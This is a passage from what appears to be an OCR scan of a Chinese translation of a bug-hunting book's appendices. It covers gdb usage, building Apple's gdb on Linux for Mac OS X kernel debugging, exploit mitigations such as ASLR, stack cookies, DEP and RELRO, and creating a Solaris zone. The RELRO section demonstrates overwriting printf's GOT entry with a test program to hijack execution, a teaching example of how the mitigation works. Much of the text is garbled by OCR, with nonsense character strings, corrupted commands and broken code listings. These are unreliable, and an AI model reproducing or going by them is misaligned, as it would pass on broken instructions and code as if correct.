info registers 列 出 寄存 器 和 寄存 器 值 
backtrace 打印 函数 调用 栈 的 回 剖 
disassemble address 以 机 器 指令 形式 转 储 address 附 近 一 段 内 存 的 内 容 
B.4.7 ”其 他 命令 
命 5 "EE". 
set disassembly -flavor intel|att 设置 反 汇 编 风 格 为 Intel 或 者 AT&T 汇 编 语法 。 默 认 使 用 
AT&T 语 法 
shell command 执行 shell 命 令 command 
set variable *(address)=value 把 value 保 存 到 address 指 定 的 位 置 


source file 


set follow-fork-mode parent |child 


Mx to Fi Leis A Val A i f A 
Ti VEA ax Hue 2C XE Fé parent sk, T- E fæchild 


166 | 附录 B 3S x 


B.5 用 Linux 作 为 Mac OS X 内 核 调 试 的 主机 


这 一 节 介 绍 将 一 台 Linux 系统 作为 Mac OS X 内 核 调 试 主机 的 详细 步骤 。 
O 第 一 步 : 安装 一 个 古老 的 Red Hat 7.3 Linux 操作 系统 。 

口 第 二 步 : 获取 必要 的 软件 包 。 

O 第 三 步 : 在 Linux 主机 上 构建 Apple Vis « 

D 第 四 步 : 准备 调试 环境 。 


B.5.1 第 一 步 : 安装 一 个 古老 的 Red Hat 7.3 Linux 操 作 系 统 


因为 所 使 用 的 Apple GNU 调试 器 (gdb) 版 本 需要 版 本 3 以 上 的 GNU C 编译 
器 〈gcc ) 才能 正确 构建 ， 我 下 载 并 安装 了 古老 的 Red Hat 7.3 Linux 系统 中。 安装 
时 选择 日 定义 安装 类 型 。 需要 选择 安 污 包 ( Package Group Selection ) 时 ， 在 各 种 
包 选 项 中 我 只 选择 了 Network Support, Software Development 和 OpenSSH 包 。 这 
些 包涵 盖 了 Linux 上 构建 Apple gdb 必需 的 全 部 开发 工具 和 库 。 安装 时 我 增加 了 一 
个 非特 权 用 户 华 ， 用 户主 目录 为 home/tk。 











B.5.2 第 二 步 : 获取 必要 的 软件 包 


MIB Linux 主机 之 后 ， 我 下 载 了 以 下 软件 包 。 

O Apple 定制 版 本 的 gdb 源 代码 T 

Q GNU 标准 版 本 的 gdb JV | 。 

口 在 Linux 下 编 详 Apple gdb 的 一 个 补丁 “。 

O 相应 的 XNU 内 核 源 代码 版 本 。 我 是 要 准备 Linux 调试 主机 来 研究 第 7 Sf 
述 的 内 核 bug， 因 此 我 下 载 了 XNU 版 本 792.13.8” 。 

口 相应 的 Apple 内 核 调 试 包 ( Apple’s Kernel Debug Kit )。 我 是 在 Mac OS X 
10.4.8 上 发 现 了 第 7 章 探 讨 的 那个 bug. 因此 我 下 载 了 相应 的 内 核 调试 包 版 
本 10.4.8 ( Kernel Debug Kit 10.4.8 8L2127.dmg )。 


B.5.3 ”第 三 步 : 在 Linux 主 机 上 构建 Apple 调 试 器 
在 Linux 主机 上 下 载 必 要 的 软件 包 之 后 ， 解 压 以 下 两 个 版 本 的 gdb。 


linux$ tar xvzf gdb-292.tar.gz 
linux$ tar xvzf gdb-5.3.tar.gz 


然后 用 GNU gdb 的 mmalloc H RÈ H f' Apple UV R3 Wy FA H Ko 
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linux$ mv gdb-292/src/mmalloc gdb-292/src/old mmalloc 
linux$ cp -R gdb-5.3/mmalloc gdb-292/src/ 


在 Apple 版 本 的 gdb 中 应 用 补丁 。 


linux$ cd gdb-292/src/ 

linux$ patch -p2 « ../../osx gdb.patch 
patching file gdb/doc/stabs.texinfo 
patching file gdb/fix-and-continue.c 
patching file gdb/mach-defs.h 

patching file gdb/macosx/macosx-nat-dyld.h 
patching file gdb/mi/mi-cmd-stack.c 


使 用 以 下 命令 构建 必要 的 库 。 


linux$ su 
Password: 
linux# pwd 


/home/tk/gdb-292/src 


linux# cd readline 
linux# ./configure; make 


linux# cd ../bfd 
linux# ./configure --target=i386-apple-darwin --program-suffix=_osx; make; 一 
make install 


linudt cd ../mmalloc 
linux# ./configure; make; make install 


linux cd ../intl 
linux# ./configure; make; make install 


linux# cd ../libiberty 
linux# ./configure; make; make install 


linux# cd ../opcodes 
linux# ./configure --target=i386-apple-darwin --program-suffix=_osx; make; 一 
make install 


AJ FE VS IAS AS , 我 需要 从 XNU 内 核 源 代码 中 复制 一 些 头 文件 到 Linux € 
机 的 include 目录 中 。 


linux# cd /home/tk 

linux# tar -zxvf xnu-792.13.8.tar.gz 

linux# cp -R xnu-792.13.8/osfmk/i386/ /usr/include/ 
linux# cp -R xnu-792.13.8/bsd/i386/ /usr/include/ 
cp: overwrite "/usr/include/i386/Makefile'? y 

cp: overwrite "/usr/include/i386/endian.h'? y 

cp: overwrite "/usr/include/i386/exec.h'? y 

cp: overwrite "/usr/include/i1386/setjmp.h'? y 
linux# cp -R xnu-792.13.8/osfmk/mach /usr/include/ 
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然后 我 在 新 的 _types.h 文件 中 注释 掉 一 些 类 型 定义 ， 避 人 免 编译 期 冲突 ( 见 第 
39 行 、 第 43 行 和 第 78 行 至 第 8117 )。 
linux# vi +38 /usr/include/i386/ types.h 


[..] 
38 #ifdef | GNUC - 


39 // typedef signed char . int8 t; 

40 #else /* ! GNUC_ */ 

41 typedef char _ int8 t; 

42 #endif /* ! GNUC */ 

43 // typedef unsigned char . uint8 t; 

44 // typedef short . int16 t; 

45 // typedef unsigned short __uint16 t; 

46 // typedef int . int32 t; 

47 // typedef unsigned int . uint32 t; 

48 // typedef long long . int64 t; 

49 // typedef unsigned long long . uint64 t; 

78 //typedef union ( 

79 // char __mbstate8[128]; 

9n // lono lnno mhetatal 。 /* far alignment */ 
ov ff LVII iL ms MUS LALULY 1 Iv arrgumetit 1 


81 //}  mbstate t; 


25 X TL. F/home/tk/gdb-292/src/gdb/macosx/1386-macosx-tdep.c 新 增 一 个 include. 


linux# vi +24 /home/tk/gdb-292/src/gdb/macosx/1386-macosx-tdep.c 
[ 

24 #include <string.h> 

25 #include "defs.h" 

26 #include "frame.h" 

27 #include "inferior.h" 


Ina, HA Pig Sak Ped I at o 
linux# cd gdb-292/src/gdb/ 


linux# ./configure --target-i1386-apple-darwin --program-suffix- osx --disable-gdbtk 
linux# make; make install 


编 详 完成 后 , 我 用 root keari, 以 便 能 在 /usrlocalbin/ 下 创建 所 需 
的 目录 。 


linux# cd /home/tk 
linux# gdb osx -q 
(gdb) quit 


JEJE, MAMER T o 
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B54 第 四 步 : 准备 调试 环境 


在 Mac OS X 下 解压 缩 下 载 的 内 核 调 试 包 〈Kernel Debug Kit ) 磁盘 映像 文件 
(dmg ), 通过 scp 命令 把 文件 传 到 Linux 主机 上 , 并 将 目录 命名 为 KernelDebugKit - 
10.4.8。 我 还 把 XNU 源 代码 复制 到 调试 右 的 搜索 路 径 中 。 





linux# mkdir /SourceCache 
linux# mkdir /SourceCache/xnu 
linux# mv xnu-792.13.8 /SourceCache/xnu/ 


在 第 7 章 dE CL ZR T wer Pa EY VHS] AE RE G Mac OS X HLH 


附注 

[1] J Solaris Modular Debugger Guide: http://dlc.sun.com/osol/docs/content/ MODDEBUG/ moddebug. 

html ( HEX http://bit.ly/wVpBK9 )。 

Tl, http://www.vmware.com/ 。 

JL http:/Avww.microsoft.com/whde/DevTools/Debugging/default.mspx ( HEX http://bit.ly/Akd3nd ). 

JL http://www.gnu.org/software/gdb/documentation/ ( 短 址 为 http:Wbit.IyYI3bj3w ). 

现在 仍 有 一 些 可 用 的 镜像 下 载 站 点 可 以 得 到 Red Hat 7.3 的 ISO 映像 。 截至 本 章 撰写 时 ， 以 

下 这 些 链 接 仍 然 有 效 : http://ftp-stud.hs-esslingen.de/Mirrors/archive.download.redhat.com/ 

redhat/linux/7.3/de/iso/1386/ ( 短 址 为 http://bit.ly/Ifacfn ), http://mirror.fraunhofer.de/archive. 

download.redhat.com/redhat/linux/7.3/en/iso/i386/ ( 短 址 为 http://bit.ly/Ifasem ), http://mirror. 

cs.wisc.edu/pub/mirrors/linux/archive.download.redhat. com/redhat/linux/7.3/en/iso/1386/ ( 短 址 

为 http://bit.ly/HVo30i )。 

[6] Apple 自 定 义 版 本 的 gdb 源 代 人 码 可 从 以 下 网 址 下 载 : httpi//www.opensource.apple.com/ 
tarballs/gdb/gdb-292.tar.gz ( 短 址 为 http://bit.ly/IbY3IW )。 

[7] GNU 标准 版 本 的 gdb 源 代码 可 从 以 下 网 址 下 载 : http://ftp.gnu.org/pub/gnu/gdb/gdb-5.3.tar.gz 
( 短 址 为 http://bit.ly/119Z05 )。 

[8] Apple 的 GNU 调试 硕 补 丁 可 从 以 下 网 址 获取 : http://www.trapkit.de/books/bhd/osx_gdb.patch 
( 短 址 为 http://bit.ly/IZOX#P )。 

[9] XNU 版 本 792.13.8 可 从 以 下 网 址 下 载 : http:/www.opensource.apple.com/tarballs/xnu/xnu- 
792.13.8.tar.gz ( 短 址 为 http://bit.ly/HUs63y )。 








缓解 技术 








本 附录 包含 漏洞 利用 绥 解 技术 的 相关 信息 。 


C.1 漏洞 利用 缓解 技术 


如 今 ， 为 了 证 内 存 数 据 损坏 漏洞 的 利用 尽 可 能 地 困难 ， 人 们 设计 了 各 种 漏洞 
利用 缓解 技术 和 机 制 。 最 流行 的 技术 有 以 下 几 种 : 

a 地 址 空间 布局 随机 化 (ASLR ) 

O 安全 cookie (/GS ), FEAT Yak HIR? ( Stack-Smashing Protection, SSP ), 

或 者 Stack Canaries 

a 数据 执行 保护 技术 (DEP )， 或 者 不 可 执行 内 存 保护 CNX ) 

此 外 ， 还 有 一 些 绥 解 技术 跟 某 种 操作 系统 平台 、 某 种 特殊 的 堆 实 现 机 制 或 者 
跟 某 种 文件 格式 (如 SafeSEH, SEHOP 或 RELRO ( W C2 55 ) 5$) 绑 定 。 另 外 
也 有 一 些 堆 绥 解 技术 ， 如 堆 cookie (heap cookies )、 随 机 化 (randomization ), safe 
unlinking 等 。 

这 么 多 绥 解 技术 ， 足 以 轻松 写 出 另 一 本 书后， 因此 这 里 只 集中 介绍 最 流行 的 
几 种 技术 和 几 个 检测 工具 。 
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注意 在 漏洞 利用 缓解 技术 和 绕 过 这 些 技术 的 方法 之 间 ， 竞 和 争 是 永久 的 。 黄 至 使 
用 上 述 这 些 机 制 的 系统 都 可 能 在 茶 种 情况 下 反而 被 成 功 地 利用 。 


C.1.1 ”地址 空间 布局 随机 化 CASLRO 


ASLR 随机 化 进程 空间 中 关键 区 域 的 位 置 (通常 包括 可 执行 代码 基地 址 、 栈 、 
堆 和 库 的 位 置 等 )， 从 而 防止 漏洞 利用 程序 的 作者 猿 到 目标 地 址 。 假 如 你 找到 一 个 
write 4 primitive 漏洞 ， 有 机 会 在 任何 期 望 的 内 存 位 置 写 入 指定 的 4 个 字 方 。 如 果 选 
择 一 个 可 徘 的 内 存 位 置 来 绑 写 ， 这 全 为 你 提供 了 强 有 力 的 实施 利用 的 机 会 。 有 了 
ASLR， 禾 写 可 靠 的 内 存 位 置 就 难得 多 了 。 当 然 ，ASLR RAXM EMAR, 


























C.1.2 ”安全 cookie (GS)， 栈 缓冲 区 浇 出 保护 (SSP)， 
sy Stack Canaries 





yx IC Jr TET FF [16] — T eT. canary 或 者 cookie, 保 护 与 过 程 调 用 相关 的 函数 
元 数据 ( 例如 返回 地 址 )。 在 处 理 返 回 地 址 之 前 ,程序 会 检查 canary BK cookie 的 有 
效 性 ， 栈 帧 里 的 数据 也 会 重新 组 织 ， 保 护 函 数 和 参数 有 关 的 指针 。 即 便 能 在 一 个 
用 这 种 缓解 技术 保护 的 函数 中 找到 一 个 栈 缓冲 区 溢出 ， 要 利用 它 也 是 很 难 的 。 外 











C.1.3 NX 和 DEP 


NX 位 (No eXecute bit) 是 CPU 的 一 种 特性 ， 可 防止 在 进程 的 数据 内 存 页 面 
上 执行 代码 。 许 多 现代 操作 系统 都 采用 了 NX 位。 在 微软 的 Windows 上 ， 硬 件 强 
市 的 DEP ( Data Execution Prevention ) EFR FER CPU AY NX 位， 将 进程 中 | 除 明 
确 包 含 可 执行 代码 的 其 余 内 存 位 置 全 都 标记 为 不 可 执行 DEP 是 Windows XP SP2 
以 及 Windows Server 2003 SP1 引 入 的 。 在 Linux E, NX 由 支持 AMD 和 Intel 64 
位 CPU 的 内 核 强制 实施 。 对 于 在 老 的 32 位 x86 CPU 上 运行 的 Linux, ExecShield "| 
和 了 PaX ”模拟 了 NX 功能 。 





C.1.4 检测 漏洞 利用 缓解 技术 


和 尝试 绕 过 这 些 绥 解 搁 术 之 前 ， 必 须 检 测 当 前 运行 的 进程 实际 使 用 的 是 哪 种 
技术 。 
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通过 特殊 的 API 和 编译 期 选项 ， 





绥 解 可 由 系统 策略 控制 。 例 如 ，Windows 客 
户 端 操作 系统 的 默认 系统 级 DEP 策略 称 为 OptIn。 在 这 种 操作 模式 下 ，DEP DOS 
明确 加 入 DEP 的 进程 起 作用 。 进 程 加 入 DEP 的 方式 多 种 多 样 。 
编译 时 用 适当 的 链接 开关 ( /NXCOMPAT )， 或 者 使 用 API SetProcessDEPPolicy 以 
编程 方式 将 应 用 程序 加 入 到 DEP 中 。Windows 支持 4 种 硬件 强制 DEP 的 系统 级 
peal, E Windows Vista 及 后 续 版 本 上 ， 可 以 使 用 控制 台 应 用 程序 bededit.exe 来 
验证 系统 级 DEP 入 上 略 ， 但 是 这 必须 在 权限 提升 的 Windows 命令 行 中 运行 。 使 用 





壁 如 ， 你 可 以 在 





Sysinternal 的 Process Explorer "| 验证 应 用 程序 的 DEP 和 ASLR 设置 。 


注意 ”要 将 Process Explorer 配置 成 显示 进程 的 DEP 和 ASLR 状态 ， 需 要 在 视图 
区 (View) 增加 以 下 两 列 : View > Select Columns > DEP Status 和 View > 
Select Columns > ASLR Enabled。 此 外 还 可 以 设置 底部 窗口 来 查看 进程 使 


用 的 DLL， 并 增加 “ASLR Enabled” 列 ( 见 图 C-1 )。 


File Options View Process Find DLE Users Help 


回 | oO) 2° Fs sx ae 


PID DEP 


Windows-Spoolertreiber 

DirectX Media — DirectX Transform... 
ATL Module for Windows XP (Uric... 
Direct Draw Ex 

Microsoft Direct Draw 

DCI Manager 

DirectX Media — Image DirectX Tra... 
Windows Socket 32-Bit DLL 
Bibliothek für Steuerelemente 

DHCP Clientdienst 

DHCPv5-Client 

dava( Mf Fiatom SE Binary 
Java(TM) Platform SE binary 

Java HotSpoat(TM) Client VM 
Java(TM) Platform SE binary 
Java(TM) Platform SE binary 
Java(TM) Platform SE binary 
Java(TM) Platform SE binary 
Java(TM) Platform SE binary 
Java(TM) Deployment Library 
Java(TM) Platform SE binary 


Company Name 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microeoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 


Sun Microsystems, Inc. 
Sun Microsystems, Inc. 
Sun Microsystems, Inc. 
Sun Microsystems, Inc. 
Sun Microsystems, Inc. 
Sun Microsystems, Inc. 


Sun Microsystems, Inc 
Sun Microsystems, Inc 


Sun Microsystems, Inc. 


Version 
5.1.7600 16385 
8.0.7600.16335 
3.5.2284 0 
6.1.7600.16385 
B.1.7600.16383 
6.1.7600.16385 
8.0.7600.16383 
6.1.7600.16383 
5.82. 7600.16651 
6.1.7600.16385 
6.1.7600.16383 


6.0.240.7 
19.1.02 

6.0.240.7 
6.0.240.7 
6.0,.240,7 
6.0.24D.7 
5.0.2407 
6.0.240.7 
6.0.240.7 


| CPU Usage: 7.58%, — Commit Charge: 22.68% Processes: 47 Physical Usage: 33.19% 





图 C-1 Process Explorer 中 显示 的 DEP 和 ASLR 状态 


新 版 本 的 Windows( Vista 及 之 后 的 版 本 ) 默认 也 支持 ASLR, 但 是 DLL 和 


EXE 必须 使 用 链接 选项 /DYNAMICBASE 加 入 ASLR 支持 。 注 


cA 
EZ 
JW 9 


有 一 点 很 重要 ， 
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如 果 不 是 进程 的 所 有 模块 都 加 入 对 ASLR 的 支持 , Bit UR ES. 实际 上 ， 
13 DEP 和 ASLR 这 类 绥 解 技术 的 有 效 性 完全 取决 于 应 用 程序 有 多 完全 、 多 彻底 地 
启用 了 每 一 种 缓解 技术 。 

图 C-1 展示 了 一 个 用 Process Explorer WE IE HJ DEP 和 ASLR 设置 的 例子 。 
注意 加 载 到 TE 进程 上 下 文中 的 Java DLL 没有 使 用 ASLR ( 由 底部 窗口 ASLR 列 
的 空 值 显示 ) 微软 也 发 布 了 一 款 称 为 BinScope Binary Analyzer 的 工具 站, 界面 简 
单 易 用 ， 用 来 分 析 二 进 制 文件 中 的 各 种 安全 保护 。 

如 果 DEP 和 ASLR 部 正确 部 署 ， 开 发 漏洞 利用 程序 将 困难 许多 。 

要 查看 一 个 Windows 二 进 制 文件 是 否 文 持 安全 cookie ( /GS ) 绥 解 技术 ， 可 
以 用 IDA Pro 反 汇 编 这 个 二 进 制 文件 并 在 函数 的 前 导 指 令 〈function prologue ) 和 
出 口 指令 ( function epilogue ) 处 寻找 对 安全 cookie 的 引用 ， 如 图 C-2 所 示 。 




















edi, edi 

ebp 

ebp, esp 

esp, 26Ch 

eax, _ security cookie 
eax, ebp 

[ebp*var 5], eax 

eax, [ebp*arg €] 

eax, eax 

edx, dword ptr [ebp+Args] 
ecx, [ebp*arg 8] 

esi 

esi, [ebp*«hHodule] 
loc_4674FB 


ecx, [ebp*var 5] 

ecx, ebp 

esi 

@ security _check_cookie@4 ; . security check cookie(Xx) 


?LoadMUIFile@@YGPAUHINSTANCE G@PAUI@PAG11HH@Z2 endp 





图 C-2 ”函数 前 导 和 出 口 处 的 安全 cookie (/GS ) 引用 (CIDA Pro) 


使 用 我 的 checksec.sh PRIZE ,可 以 检查 跟 不 同 漏洞 利用 缓解 技术 相关 的 Linux 
系统 级 配置 ， 以 及 相关 的 ELF 二 进 制 文件 及 进程 信息 。 








C.2 RELRO 
RELRO 是 一 种 通用 的 漏洞 利用 缓解 技术 ,可 用 来 强化 ELF' "| 二进制 文件 或 者 
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进程 的 数据 段 ,ELF 是 一 种 常用 的 可 执行 文件 和 库 的 格式 ,广泛 使 用 于 各 种 类 Unix 
系统 ， 包 括 Linux, Solaris fll BSD, RELRO 有 两 种 不 同 的 模式 。 





1. 部 分 RELRO 

O 编译 需 命 令 : gcc -Wl. -z, relro, 

DELF 段 重新 组 织 ， 因 此 ELF 内 部 的 数据 段 ( .got、.dtors 等 ) 在 程序 的 数 
据 段 ( .data 和 .bss ) 之 前 。 

口 Non-PLT GOT 是 只 读 的 。™ 

a 依赖 PLT HJ ( PLT-dependent) GOT 仍 是 可 写 的 。 

2. 完全 RELRO 

口 编译 需 命 令 : gcc Wl. -z, relro, -z, now, 

O 文 持 部 分 RELRO 的 所 有 特性 。 

Q 额外 的 : 整个 GOT CH) 映射 为 只 读 的 。 

假如 程序 的 数据 段 ( .data 和 .bss ) 里 发 生 了 缓冲 区 溢出 ， 部 分 RELRO 和 完 








全 RELRO 都 会 重新 组 织 ELF 文件 内 部 的 数据 段 ， 以 防 数据 段 被 覆 写 ， 但 是 只 有 
完全 RELRO 能 绥 解 修改 GOT 入 口 以 控制 程序 执行 流 的 流行 技术 (IL A.4 市 )。 





为 演示 RELRO 绥 解 技术 ， 我 制作 了 两 个 简单 的 测试 用 例 。 我 用 的 平台 是 





Debian Linux 6.0。 


C.2.4 测试 用 例 1: 部 分 RELRO 


代码 清单 C-1 中 的 这 个 测试 程序 接受 一 个 内 存 地 址 ( 见 第 6 行 ) 并 试图 把 值 


0x41414141 写 到 这 个 地 址 ( 见 第 8 行 )。 


代码 清单 C-1 演示 RELRO 的 样 例 代码 ( testcase.c ) 


01 #include «stdio.h» 


02 
03 


int 


04 main (int argc, char *argv[]) 


size t *p - (size t *)strtol (argv[1], NULL, 16); 


p[0] = 0x41414141; 
printf (“RELRO: %p\n”, p); 


return 0; 


(D GOT 是 Global Offset Table 的 缩写 ，PLT 是 Procedure Linkage Table 的 缩写 。 一 一 译 者 注 
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以 部 分 RELRO 文 持 编 详 这 个 程序 。 
linux$ gcc -g -Wl,-z,relro -o testcase testcase.c 


然后 用 我 的 checksec.sh 脚本 检查 结果 二 进 制 文件 。 


linux$ ./checksec.sh --file testcase 
RELRO STACK CANARY NX PIE FILE 
Partial RELRO No canary found NX enabled No PIE testcase 


接 下 来 用 objdump 收集 代码 清单 C-1 第 9 1T printf() 库 函数 的 GOT 地 址 ， 然 
Hz HB GOTA H, 





linux$ objdump -R ./testcase | grep printf 
0804a00c R 386 JUMP SLOT printf 


在 gdb 中 启动 这 个 测试 程序 ， 看 看 到 底 会 发 生 什 么 。 





linux$ gdb -q ./testcase 


(gdb) run 0804a00c 
Starting program: /home/tk/BHD/testcase 0804a00c 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


(gdb) info registers eip 
eip 0x41414141 0x41414141 


结果 ， 如 果 只 用 部 分 RELRO 保护 ELF 二 进 制 文件 , 仍 有 可 能 筑 改 任意 GOT 
和 入口， 控制 进程 的 执行 流 。 


C.2.2 测试 用 例 2: 完全 RELRO 
这 一 次 ， 我 以 完全 RELRO 支持 编译 这 个 测试 程序 。 
linux$ gcc -g -Wl,-z,relro,-z,now -o testcase testcase.c 


linux$ ./checksec.sh --file testcase 
RELRO STACK CANARY NX PIE FILE 
Full RELRO No canary found NX enabled No PIE testcase 


然后 我 再 次 尝试 覆 写 printf() 的 GOT 地 址 。 


linux$ objdump -R ./testcase | grep printf 
08049ff8 R 386 JUMP SLOT printf 


linux$ gdb -q ./testcase 
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(gdb) run 08049ff8 
Starting program: /home/tk/BHD/testcase 08049ff8 


Program received signal SIGSEGV, Segmentation fault. 


0x08048445 in main (argc-2, argv-Oxbffff814) at testcase.c:8 
8 p[0] = 0x41414141; 


这 一 次 ,程序 执行 流 在 源 代 码 第 8 行 被 SIGSEGV 信号 中 断 。 我 们 来 看 看 为 什么 





(gdb) set disassembly-flavor intel 


(gdb) x/1i $eip 
0x8048445 《main+49> : mov DWORD PTR [eax],0x41414141 


(gdb) info registers eax 
eax 0x8049ff8 134520824 


预期 一 样 ， 程 序 试图 把 值 0x41414141 写 和 给 定 的 内 存 地 址 0x8049ff8。 


(gdb) shell cat /proc/$(pidof testcase)/maps 


08048000-08049000 r-xp 00000000 08:01 497907 /home/tk/testcase 
08049000-0804a000 r--p 00000000 08:01 497907 /home/tk/testcase 
0804a000-0804b000 rw-p 00001000 08:01 497907 /home/tk/testcase 
b7e8a000-b7e8b000 rw-p 00000000 00:00 0 

b7e8bo000-b7fcbo00 r-xp 00000000 08:01 181222 / lib/1686/cmov/libc-2.11.2.s0 
b7fcbooo-b7fcdooo r--p 0013f000 08:01 181222 / lib/1686/cmov/libc-2.11.2.s0 
b7fcdooo-b7fceoO00 rw-p 00141000 08:01 181222 /lib/i6865/cmov/libc-2.11.2.so 


Uf r'v-uvwuvwv Ves l.c 工人 rH VUV.L-CHR-L'VVV VOe. UL 


b7fce000-b7fd1000 rw-p 00000000 00:00 0 
b7fe0000-b7fe2000 rw-p 00000000 00:00 0 


b7fe2000-b7fe3000 r-xp 00000000 00:00 0 [vdso] 
b7fe3000-b7ffeo00 r-xp 00000000 08:01 171385 /1ib/1d-2.,11.2.30 
b7ffe000-b7fff000 r--p 00012000 08:01 171385 /lib/ld-2.11:2:50 
b7fff000-b8000000 rw-p 0001b000 08:01 171385 /l1ib/1d-2,11.2,50 
bffeb000-c0000000 rw-p 00000000 00:00 0 [stack | 


进程 的 内 存 映射 显示 ， 包 含 GOT 表 的 地 址 范围 08049000 到 0804a000 被 成 功 
HB (r--p). 

ZR: 如 果 完 全 RELRO 已 启用, WAGES GOT 地 址 将 导致 出 销 ,， 因 为 GOT 
Ex ITA Hase. 








C.2.3 结论 


假如 在 程序 的 数据 段 (.data 和 .bss ) 里 发 生 了 缓冲 区 溢出 ， 部 分 和 完全 
RELRO 可 以 保护 ELF 的 内 部 数据 段 ， 使 之 不 被 履 写 。 
使 用 完全 RELRO, ， 成 功 保护 GOT 入 口 不 被 修改 是 可 能 的 。 
还 有 一 种 通用 的 方法 也 可 以 实现 类 似 的 ELF 目标 文件 缓解 技术 ， 可 以 运行 在 
不 支持 RELRO KPE GE. P 
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C.3 Solaris [xX i 


Solaris 区 域 ( Solaris Zones ) 是 一 种 用 于 虚拟 化 操作 系统 服务 并 为 运行 应 用 程 
序 提供 独立 环境 的 技术 。 区 域 (zone ) 是 在 Solaris 操作 系统 的 一 个 实例 中 创建 的 
虚拟 操作 系统 环境 。 创 建 一 个 区 域 ， 就 产生 了 一 个 应 用 程序 的 执行 环境 ， 其 中 的 
进程 与 系统 其 他 部 分 隔离 开 来 。 这 种 隔离 能 够 保护 在 一 个 区 域 中 运行 的 进程 不 被 
其 他 区 域 中 运行 的 进程 监控 或 影响 。 甚 至 以 超级 用 户 号 份 运行 的 进程 也 不 能 查看 
或 影响 其 他 区 域 中 的 进程 活动 。 











C.3.4 术语 


区 域 分 为 两 种 : 全 局 的 和 非 全 局 的 。 全 局 区 域 代表 传统 的 Solaris 执行 环境 ， 
并 且 是 唯一 可 在 其 中 配置 、 安 冯 非 全 局 区 域 的 。 非 全 局 区 域 默认 不 能 访问 全 局 区 
域 和 其 他 非 全 局 区 域 。 所 有 区 域 都 有 一 个 安全 边界 包围 着 ， 且 只 能 访问 文件 系统 
层级 中 属于 自己 的 子 树 。 每 个 区 域 都 有 自己 的 根 目录 ， 有 各 上 自 的 进程 和 设备 ， 以 
低 于 全 局 区 域 的 权限 运行 。 

Sun 和 Oracle 推出 区 域 技 术 时 对 其 安全 性 非常 目 信 。 











一 旦 一 个 进程 放 到 非 全 局 区 域 中 ， 它 和 本 章 中 我 用 的 平台 是 
后 续 子 进程 都 不 能 改变 区 域 。 Solaris 10 10/08 x86/x64 DVD È 
网 络 服务 可 以 在 区 域 中 运行 。 在 一 个 区 BRR RUG E C solo 


eee 3: —-&6-9al-x86-dvd.iso », Ù zh $R kt 
域 中 运行 网 络 服务 就 限制 了 一 个 安全 漏洞 可 3 € xp Ty 


能 性 致 的 破坏 。 成 功利 用 区 域 中 软件 安全 漏 
洞 的 入 侵 者 ， 会 被 局 限 在 这 个 区 域内 的 受 限 行为 集中 。 在 一 个 区 域 中 得 
到 的 特权 是 在 整个 系统 中 所 能 得 到 特权 的 子 集 ……… d 

进程 被 限制 在 一 个 特权 子 集 中 。 特 权 约 束 保护 区 域 不 做 可 能 影响 其 
他 区 域 的 事 。 权 限 集 限制 了 区 域 中 特权 用 户 的 能 力 。 使 用 ppriv 应 用 程 
序 可 以 显示 区 域 中 有 效 的 特权 列表 。1 


Solaris 10 Gener4c. 137138. 09. 


Solaris 区 域 很 了 不 起 , 但 是 它 有 一 个 弱点 : 所 有 的 区 域 (全 局 的 和 非 全 局 的 ) 
共 至 同一 个 内 核 。 如 果 内 核 中 有 人 允许 任意 代码 执行 的 bug， 它 就 可 能 跨越 所 有 的 
安全 边界 ， 逃 离 非 全 局 区 域 ， 并 且 和 危及 其 他 非 全 局 区 域 甚至 全 局 区 域 。 为 演示 这 
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种 情况 ， 我 录制 了 一 段 视 频 ， 实 际 展 示人 第 3 草 中 描述 的 独 洞 利用 。 这 个 漏洞 利用 
程序 允许 一 个 非特 权 用 户 逃 离 非 全 局 区 域 中 ， 并 危及 所 有 其 他 区 域 ， 包 括 全 局 区 
域 。 该 视频 可 从 本 书 网 站 上 获得 。 





C.3.2 创建 一 个 Solaris 非 全 局 区 域 


以 下 步骤 创建 一 个 第 3 章 中 的 Solaris 区 域 (所 有 步骤 必须 在 一 个 全 局 区 域 中 
以 特权 用 户 的 号 份 执行 )。 





solaris# id 
uid=0(root) gid=0(root) 


solaris# zonename 
global 


HIENI KS BFE TP MFR 


solaris# mkdir /wwwzone 

solaris# chmod 700 /wwwzone 

solaris# ls -1 / | grep wwwzone 

drwx------ 2 root root 512 Aug 23 12:45 wwwzone 


然后 用 zonecfg 创建 新 的 非 全 局 区 域 。 


solaris# zonecfg -z wwwzone 

wwwzone: No such zone configured 

Use ‘create’ to begin configuring a new zone. 
zonecfg:wwwzone» create 

zonecfg:wwwzone» set zonepath=/wwwzone 
zonecfg:wwwzone» set autoboot-true 
zonecfg:wwwzone» add net 

zonecfg:wwwzone:net» set address-192.168.10.250 
zonecfg:wwwzone:net» set defrouter-192.168.10.1 
zonecfg:wwwzone:net» set physical=e1000g0 
zonecfg:wwwzone:net» end 

zonecfg:wwwzone» verify 

zonecfg:wwwzone» commit 

zonecfg:wwwzone» exit 


之 后 ， 用 zoneadm 检查 结果 。 


solaris# zoneadm list -vc 


ID NAME STATUS PATH BRAND DP 
0 global running / native shared 
- wwwzone configured /wwwzone native shared 





BE POR, KRH SITAR SE Jr DER 
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solaris# zoneadm -z wwwzone install 

Preparing to install zone «wwwzone». 

Creating list of files to copy from the global zone. 
Copying «8135» files to the zone. 

Initializing zone product registry. 

Determining zone package initialization order. 
Preparing to initialize «1173» packages on the zone. 
Initialized «1173» packages on zone. 

Zone «wwwzone» is initialized. 


solaris zoneadm -z wwwzone boot 


为 确保 一 切 正 常 ，ping 这 个 新 的 非 全 局 区 域 的 IP HEHE. 


solaris# ping 192.168.10.250 
192.168.10.250 is alive 


用 以 下 命令 登录 这 个 新 的 非 全 局 区 域 。 
solaris# zlogin -C wwwzone 


回答 了 关于 语言 和 终端 设置 的 问题 后 ， 以 root 身份 登录 并 添加 一 个 非特 权 
Jide 
solaris# id 
uid=0(root) gid=0(root) 


solaris# zonename 


wwwzone 
solaris# mkdir /export/home 


solaris# mkdir /export/home/wwwuser 
solaris# useradd -d /export/home/wwwuser wwwuser 
solaris# chown wwwuser /export/home/wwwuser 


solaris# passwd wwwuser 


然后 以 这 个 非特 权 用 户 号 份 来 利用 这 个 第 3 EHR Solaris AE] « 
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S Ny nois Peas 
四 :上 真 头 再 现 沉 行 软件 的 漏洞 发 现 全 过 程 
WR ZE EAL AN ne 


